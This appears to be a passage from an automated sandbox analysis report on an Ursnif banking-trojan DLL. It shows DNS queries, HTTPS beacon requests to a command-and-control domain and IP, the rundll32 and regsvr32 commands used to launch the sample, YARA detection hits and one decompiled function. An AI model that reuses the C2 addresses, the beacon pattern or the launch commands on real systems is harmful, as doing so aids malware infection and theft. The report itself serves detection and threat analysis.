                              Jan 6, 2022 11:54:15.862837076 CET | 49234 | 53 | 192.168.2.3 | 8.8.8.8
                              Jan 6, 2022 11:54:15.886075020 CET | 53 | 49234 | 8.8.8.8 | 192.168.2.3
                              Jan 6, 2022 11:54:19.977394104 CET | 57447 | 53 | 192.168.2.3 | 8.8.8.8
                              Jan 6, 2022 11:54:19.998173952 CET | 53 | 57447 | 8.8.8.8 | 192.168.2.3

                              DNS Queries

                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                              Jan 6, 2022 11:51:11.877147913 CET | 192.168.2.3 | 8.8.8.8 | 0x2428 | Standard query (0) | google.mail.com | A (IP address) | IN (0x0001)
                              Jan 6, 2022 11:51:14.235074043 CET | 192.168.2.3 | 8.8.8.8 | 0x1708 | Standard query (0) | google.mail.com | A (IP address) | IN (0x0001)
                              Jan 6, 2022 11:51:14.977771997 CET | 192.168.2.3 | 8.8.8.8 | 0x5506 | Standard query (0) | google.mail.com | A (IP address) | IN (0x0001)
                              Jan 6, 2022 11:51:18.989257097 CET | 192.168.2.3 | 8.8.8.8 | 0xb3a | Standard query (0) | google.mail.com | A (IP address) | IN (0x0001)
                              Jan 6, 2022 11:52:32.089071035 CET | 192.168.2.3 | 8.8.8.8 | 0x9ee1 | Standard query (0) | firsone1.online | A (IP address) | IN (0x0001)
                              Jan 6, 2022 11:52:34.447751045 CET | 192.168.2.3 | 8.8.8.8 | 0x8210 | Standard query (0) | firsone1.online | A (IP address) | IN (0x0001)
                              Jan 6, 2022 11:52:35.159759045 CET | 192.168.2.3 | 8.8.8.8 | 0x247 | Standard query (0) | firsone1.online | A (IP address) | IN (0x0001)
                              Jan 6, 2022 11:52:39.175417900 CET | 192.168.2.3 | 8.8.8.8 | 0xfb4 | Standard query (0) | firsone1.online | A (IP address) | IN (0x0001)
                              Jan 6, 2022 11:52:53.208827972 CET | 192.168.2.3 | 8.8.8.8 | 0x3f32 | Standard query (0) | kdsjdsadas.online | A (IP address) | IN (0x0001)
                              Jan 6, 2022 11:52:55.117465973 CET | 192.168.2.3 | 8.8.8.8 | 0xc96 | Standard query (0) | kdsjdsadas.online | A (IP address) | IN (0x0001)
                              Jan 6, 2022 11:52:55.785442114 CET | 192.168.2.3 | 8.8.8.8 | 0x470a | Standard query (0) | kdsjdsadas.online | A (IP address) | IN (0x0001)
                              Jan 6, 2022 11:52:59.872992992 CET | 192.168.2.3 | 8.8.8.8 | 0x3b38 | Standard query (0) | kdsjdsadas.online | A (IP address) | IN (0x0001)
                              Jan 6, 2022 11:54:13.779227018 CET | 192.168.2.3 | 8.8.8.8 | 0x352e | Standard query (0) | google.mail.com | A (IP address) | IN (0x0001)
                              Jan 6, 2022 11:54:15.196199894 CET | 192.168.2.3 | 8.8.8.8 | 0x6af6 | Standard query (0) | google.mail.com | A (IP address) | IN (0x0001)
                              Jan 6, 2022 11:54:15.862837076 CET | 192.168.2.3 | 8.8.8.8 | 0xbb0b | Standard query (0) | google.mail.com | A (IP address) | IN (0x0001)
                              Jan 6, 2022 11:54:19.977394104 CET | 192.168.2.3 | 8.8.8.8 | 0x58fa | Standard query (0) | google.mail.com | A (IP address) | IN (0x0001)

                              DNS Answers

                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                              Jan 6, 2022 11:51:11.899928093 CET | 8.8.8.8 | 192.168.2.3 | 0x2428 | Name error (3) | google.mail.com | none | none | A (IP address) | IN (0x0001)
                              Jan 6, 2022 11:51:14.255937099 CET | 8.8.8.8 | 192.168.2.3 | 0x1708 | Name error (3) | google.mail.com | none | none | A (IP address) | IN (0x0001)
                              Jan 6, 2022 11:51:15.000612974 CET | 8.8.8.8 | 192.168.2.3 | 0x5506 | Name error (3) | google.mail.com | none | none | A (IP address) | IN (0x0001)
                              Jan 6, 2022 11:51:19.008183002 CET | 8.8.8.8 | 192.168.2.3 | 0xb3a | Name error (3) | google.mail.com | none | none | A (IP address) | IN (0x0001)
                              Jan 6, 2022 11:52:32.159209967 CET | 8.8.8.8 | 192.168.2.3 | 0x9ee1 | No error (0) | firsone1.online | | 134.0.117.195 | A (IP address) | IN (0x0001)
                              Jan 6, 2022 11:52:34.516730070 CET | 8.8.8.8 | 192.168.2.3 | 0x8210 | No error (0) | firsone1.online | | 134.0.117.195 | A (IP address) | IN (0x0001)
                              Jan 6, 2022 11:52:35.227482080 CET | 8.8.8.8 | 192.168.2.3 | 0x247 | No error (0) | firsone1.online | | 134.0.117.195 | A (IP address) | IN (0x0001)
                              Jan 6, 2022 11:52:39.194324017 CET | 8.8.8.8 | 192.168.2.3 | 0xfb4 | No error (0) | firsone1.online | | 134.0.117.195 | A (IP address) | IN (0x0001)
                              Jan 6, 2022 11:52:53.233433962 CET | 8.8.8.8 | 192.168.2.3 | 0x3f32 | Name error (3) | kdsjdsadas.online | none | none | A (IP address) | IN (0x0001)
                              Jan 6, 2022 11:52:55.136367083 CET | 8.8.8.8 | 192.168.2.3 | 0xc96 | Name error (3) | kdsjdsadas.online | none | none | A (IP address) | IN (0x0001)
                              Jan 6, 2022 11:52:55.804541111 CET | 8.8.8.8 | 192.168.2.3 | 0x470a | Name error (3) | kdsjdsadas.online | none | none | A (IP address) | IN (0x0001)
                              Jan 6, 2022 11:52:59.894037962 CET | 8.8.8.8 | 192.168.2.3 | 0x3b38 | Name error (3) | kdsjdsadas.online | none | none | A (IP address) | IN (0x0001)
                              Jan 6, 2022 11:54:13.795664072 CET | 8.8.8.8 | 192.168.2.3 | 0x352e | Name error (3) | google.mail.com | none | none | A (IP address) | IN (0x0001)
                              Jan 6, 2022 11:54:15.220105886 CET | 8.8.8.8 | 192.168.2.3 | 0x6af6 | Name error (3) | google.mail.com | none | none | A (IP address) | IN (0x0001)
                              Jan 6, 2022 11:54:15.886075020 CET | 8.8.8.8 | 192.168.2.3 | 0xbb0b | Name error (3) | google.mail.com | none | none | A (IP address) | IN (0x0001)
                              Jan 6, 2022 11:54:19.998173952 CET | 8.8.8.8 | 192.168.2.3 | 0x58fa | Name error (3) | google.mail.com | none | none | A (IP address) | IN (0x0001)

                              HTTP Request Dependency Graph

                              • firsone1.online

                              HTTPS Proxied Packets

                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              0 | 192.168.2.3 | 49803 | 134.0.117.195 | 443 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              2022-01-06 10:52:33 UTC | 0 | OUT | GET /jkloll/gfrPkOjYD/LcWirUQZbFxpai_2Bx8v/N7vD_2B_2FH5uEzDoVv/7dpgwOBiuXHqM667wEqs_2/BsKhITLbECD_2/BrsCuZOH/9inDS3N_2BAw6xzSFVI4I3r/K9MZrdcrj9/apJueAkO6z3aFPMvl/1u8BPeULfl0I/HXQ5umECQED/KqvCLcJ4CKU902/Ue_2BCWirDHmDgB_2FqvO/givATx4gqqgglwS7/v4BEhQLSTM_2B/_2Fe_2Bu.mki HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                              Host: firsone1.online
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              2022-01-06 10:52:33 UTC | 0 | IN | HTTP/1.1 404 Not Found
                              Date: Thu, 06 Jan 2022 10:52:39 GMT
                              Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                              Content-Length: 460
                              Connection: close
                              Content-Type: text/html; charset=iso-8859-1
                              2022-01-06 10:52:33 UTC | 0 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6a 6b 6c 6f 6c 6c 2f 67 66 72 50 6b 4f 6a 59 44 2f 4c 63 57 69 72 55 51 5a 62 46 78 70 61 69 5f 32 42 78 38 76 2f 4e 37 76 44 5f 32 42 5f 32 46 48 35 75 45 7a 44 6f 56 76 2f 37 64 70 67 77 4f 42 69 75 58 48 71 4d 36 36 37 77 45 71 73 5f 32 2f 42 73 4b 68 49 54 4c 62 45 43 44 5f 32 2f 42 72 73 43 75 5a 4f 48 2f 39 69 6e
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /jkloll/gfrPkOjYD/LcWirUQZbFxpai_2Bx8v/N7vD_2B_2FH5uEzDoVv/7dpgwOBiuXHqM667wEqs_2/BsKhITLbECD_2/BrsCuZOH/9in


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              1 | 192.168.2.3 | 49811 | 134.0.117.195 | 443 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              2022-01-06 10:52:34 UTC | 1 | OUT | GET /jkloll/5uYUQ_2FQN86iHNY49L/DPZD3ITzlDFx_2FKNcjDOh/yQZWvL_2BsZuR/HjaAog4G/r_2B0Neng3bSSbmoFIlXYWw/KZfLo5Aq9a/AVLYw7N9qXQVRr8XS/UyotZ_2BKl95/LDReSgxNZCB/ot3ANBI_2Bmf2Z/wTO_2FRZveJAMYt1OAKW1/qd_2B_2BejnLQISw/xnKbO7DZ_2BFAtS/sbOL_2FiP79J/M.mki HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                              Host: firsone1.online
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              2022-01-06 10:52:34 UTC | 1 | IN | HTTP/1.1 404 Not Found
                              Date: Thu, 06 Jan 2022 10:52:41 GMT
                              Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                              Content-Length: 437
                              Connection: close
                              Content-Type: text/html; charset=iso-8859-1
                              2022-01-06 10:52:34 UTC | 1 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6a 6b 6c 6f 6c 6c 2f 35 75 59 55 51 5f 32 46 51 4e 38 36 69 48 4e 59 34 39 4c 2f 44 50 5a 44 33 49 54 7a 6c 44 46 78 5f 32 46 4b 4e 63 6a 44 4f 68 2f 79 51 5a 57 76 4c 5f 32 42 73 5a 75 52 2f 48 6a 61 41 6f 67 34 47 2f 72 5f 32 42 30 4e 65 6e 67 33 62 53 53 62 6d 6f 46 49 6c 58 59 57 77 2f 4b 5a 66 4c 6f 35 41 71 39 61
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /jkloll/5uYUQ_2FQN86iHNY49L/DPZD3ITzlDFx_2FKNcjDOh/yQZWvL_2BsZuR/HjaAog4G/r_2B0Neng3bSSbmoFIlXYWw/KZfLo5Aq9a


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              2 | 192.168.2.3 | 49812 | 134.0.117.195 | 443 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              2022-01-06 10:52:35 UTC | 2 | OUT | GET /jkloll/hyS7uNj0vVvG2CRrLbZZ4/bEGaiUTSXLmYtAhM/9KrJzj3TRaRiQeM/Wjbl2GC0W3yiu55m7X/keTVHZUts/0VdexVHBIDjPgfNBu0uT/PguFQeLj5VBY4GnMnUK/UA0cB1h_2F_2BMAAiPyhOY/5Iw7z41oIrnZb/4nW_2Ff2/TobIBfFnKF4Ggs861byzcAY/C9cxP76_2B/WGhxpkLq_2Fup2HWB/_2BU22RdSz/9MAm9.mki HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                              Host: firsone1.online
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              2022-01-06 10:52:35 UTC | 2 | IN | HTTP/1.1 404 Not Found
                              Date: Thu, 06 Jan 2022 10:52:42 GMT
                              Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                              Content-Length: 449
                              Connection: close
                              Content-Type: text/html; charset=iso-8859-1
                              2022-01-06 10:52:35 UTC | 2 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6a 6b 6c 6f 6c 6c 2f 68 79 53 37 75 4e 6a 30 76 56 76 47 32 43 52 72 4c 62 5a 5a 34 2f 62 45 47 61 69 55 54 53 58 4c 6d 59 74 41 68 4d 2f 39 4b 72 4a 7a 6a 33 54 52 61 52 69 51 65 4d 2f 57 6a 62 6c 32 47 43 30 57 33 79 69 75 35 35 6d 37 58 2f 6b 65 54 56 48 5a 55 74 73 2f 30 56 64 65 78 56 48 42 49 44 6a 50 67 66 4e 42
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /jkloll/hyS7uNj0vVvG2CRrLbZZ4/bEGaiUTSXLmYtAhM/9KrJzj3TRaRiQeM/Wjbl2GC0W3yiu55m7X/keTVHZUts/0VdexVHBIDjPgfNB


                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                              3 | 192.168.2.3 | 49813 | 134.0.117.195 | 443 | C:\Windows\SysWOW64\rundll32.exe
                              Timestamp | kBytes transferred | Direction | Data
                              2022-01-06 10:52:39 UTC | 3 | OUT | GET /jkloll/M6Ph7XVMuIVnQJ918dgP/iGy5ZNMffw4qd2BD6Nw/xbvKMlzJtC6XNowbd_2FKm/UnXnZNKrDT7Gw/3YWrqGQ_/2BiRpEYdm3L3qPwkGvjzy_2/FMNOIyI3KK/TIH3Ipp58a4osBqNi/vURpkVVskEDy/A_2BcLgra2r/_2BirjcwqYwgZh/tXOQJ7uW2wVdt9rR3elhH/xJqL8can/GFbQ.mki HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                              Host: firsone1.online
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              2022-01-06 10:52:39 UTC | 3 | IN | HTTP/1.1 404 Not Found
                              Date: Thu, 06 Jan 2022 10:52:46 GMT
                              Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                              Content-Length: 424
                              Connection: close
                              Content-Type: text/html; charset=iso-8859-1
                              2022-01-06 10:52:39 UTC | 3 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6a 6b 6c 6f 6c 6c 2f 4d 36 50 68 37 58 56 4d 75 49 56 6e 51 4a 39 31 38 64 67 50 2f 69 47 79 35 5a 4e 4d 66 66 77 34 71 64 32 42 44 36 4e 77 2f 78 62 76 4b 4d 6c 7a 4a 74 43 36 58 4e 6f 77 62 64 5f 32 46 4b 6d 2f 55 6e 58 6e 5a 4e 4b 72 44 54 37 47 77 2f 33 59 57 72 71 47 51 5f 2f 32 42 69 52 70 45 59 64 6d 33 4c 33 71
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /jkloll/M6Ph7XVMuIVnQJ918dgP/iGy5ZNMffw4qd2BD6Nw/xbvKMlzJtC6XNowbd_2FKm/UnXnZNKrDT7Gw/3YWrqGQ_/2BiRpEYdm3L3q


                              Code Manipulations

                              Statistics

                              CPU Usage

                              Memory Usage

                              High Level Behavior Distribution

                              Behavior

                              System Behavior

                              General

                              Start time:11:50:55
                              Start date:06/01/2022
                              Path:C:\Windows\System32\loaddll32.exe
                              Wow64 process (32bit):true
                              Commandline:loaddll32.exe "C:\Users\user\Desktop\9091.dll"
                              Imagebase:0xd70000
                              File size:116736 bytes
                              MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439767410.0000000003288000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439730823.0000000003288000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439792017.0000000003288000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.795901018.0000000000990000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.797295026.0000000002B69000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439887560.0000000003288000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439905362.0000000003288000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439867059.0000000003288000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.797510932.0000000003288000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439827039.0000000003288000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439848821.0000000003288000.00000004.00000040.sdmp, Author: Joe Security
                              Reputation:moderate

                              General

                              Start time:11:50:55
                              Start date:06/01/2022
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\9091.dll",#1
                              Imagebase:0xd80000
                              File size:232960 bytes
                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              General

                              Start time:11:50:55
                              Start date:06/01/2022
                              Path:C:\Windows\SysWOW64\regsvr32.exe
                              Wow64 process (32bit):true
                              Commandline:regsvr32.exe /s C:\Users\user\Desktop\9091.dll
                              Imagebase:0xaa0000
                              File size:20992 bytes
                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.448462123.0000000005008000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.448445867.0000000005008000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.448406927.0000000005008000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.448351506.0000000005008000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.448474964.0000000005008000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.795928637.0000000000A80000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.448483384.0000000005008000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.798351348.0000000010000000.00000040.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.798052757.0000000004A99000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.798106316.0000000005008000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.448428236.0000000005008000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.448381234.0000000005008000.00000004.00000040.sdmp, Author: Joe Security
                              Reputation:high

                              General

                              Start time:11:50:55
                              Start date:06/01/2022
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe "C:\Users\user\Desktop\9091.dll",#1
                              Imagebase:0xbe0000
                              File size:61952 bytes
                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000002.798277282.0000000004E58000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000002.797837616.00000000047E9000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.438242726.0000000004E58000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.438346366.0000000004E58000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.438314861.0000000004E58000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.438169523.0000000004E58000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.438331806.0000000004E58000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000002.798529500.0000000010000000.00000040.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000002.797710008.0000000004400000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.438296466.0000000004E58000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.438266295.0000000004E58000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.438216608.0000000004E58000.00000004.00000040.sdmp, Author: Joe Security
                              Reputation:high

                              General

                              Start time:11:50:56
                              Start date:06/01/2022
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe C:\Users\user\Desktop\9091.dll,DllRegisterServer
                              Imagebase:0xbe0000
                              File size:61952 bytes
                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.433214839.0000000004D78000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.433186637.0000000004D78000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.433125624.0000000004D78000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.433150946.0000000004D78000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.433232382.0000000004D78000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000002.798374776.0000000004D78000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.433256669.0000000004D78000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.433093104.0000000004D78000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000002.796340255.0000000000BA0000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000002.798181911.00000000046D9000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.433269351.0000000004D78000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000002.798497438.0000000010000000.00000040.00020000.sdmp, Author: Joe Security
                              Reputation:high

                              Disassembly

                              Code Analysis


                                Executed Functions

                                Control-flow Graph

                                • Legend: Executed / Not Executed
                                • [graph for function 10001e13 (basic blocks 10001e13-10001ee2) not reproduced in text]
                                C-Code - Quality: 69%
                                			E10001E13(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                                				intOrPtr _v12;
                                				struct _FILETIME* _v16;
                                				short _v60;
                                				struct _FILETIME* _t14;
                                				intOrPtr _t15;
                                				long _t18;
                                				void* _t19;
                                				void* _t22;
                                				intOrPtr _t31;
                                				long _t32;
                                				void* _t34;
                                
                                				_t31 = __edx;
                                				_t14 =  &_v16;
                                				GetSystemTimeAsFileTime(_t14);
                                				_push(0x192);
                                				_push(0x54d38000);
                                				_push(_v12);
                                				_push(_v16);
                                				L10002160();
                                				_push(_t14);
                                				_v16 = _t14;
                                				_t15 =  *0x10004144;
                                				_push(_t15 + 0x1000505e);
                                				_push(_t15 + 0x10005054);
                                				_push(0x16);
                                				_push( &_v60);
                                				_v12 = _t31;
                                				L1000215A();
                                				_t18 = _a4;
                                				if(_t18 == 0) {
                                					_t18 = 0x1000;
                                				}
                                				_t19 = CreateFileMappingW(0xffffffff, 0x10004148, 4, 0, _t18,  &_v60); // executed
                                				_t34 = _t19;
                                				if(_t34 == 0) {
                                					_t32 = GetLastError();
                                				} else {
                                					if(_a4 != 0 || GetLastError() == 0xb7) {
                                						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                                						if(_t22 == 0) {
                                							_t32 = GetLastError();
                                							if(_t32 != 0) {
                                								goto L9;
                                							}
                                						} else {
                                							 *_a8 = _t34;
                                							 *_a12 = _t22;
                                							_t32 = 0;
                                						}
                                					} else {
                                						_t32 = 2;
                                						L9:
                                						CloseHandle(_t34);
                                					}
                                				}
                                				return _t32;
                                			}

                                APIs
